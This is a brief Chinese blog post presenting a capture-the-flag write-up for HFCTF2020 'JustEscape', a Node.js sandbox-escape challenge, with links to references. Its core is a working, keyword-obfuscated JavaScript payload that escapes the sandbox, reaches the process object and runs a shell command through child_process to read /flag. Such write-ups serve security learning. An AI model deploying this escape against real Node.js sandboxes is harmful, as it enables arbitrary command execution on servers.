web | [HFCTF2020]JustEscape

这一题是node的命令执行和沙箱逃逸

我参考了这篇文章https://www.jianshu.com/p/67b5b05137da

js Error().stack: https://www.bookstack.cn/read/node-in-debugging/3.3ErrorStack.md

node.js的常见漏洞:https://xz.aliyun.com/t/7184

最终payload:

(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_proces`}s`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return this.proces`}s`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_proces`}s`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()

详细一点的以后在补,有点累了。

posted @ 2020-12-22 22:07  Mz1  阅读(722)  评论(0编辑  收藏  举报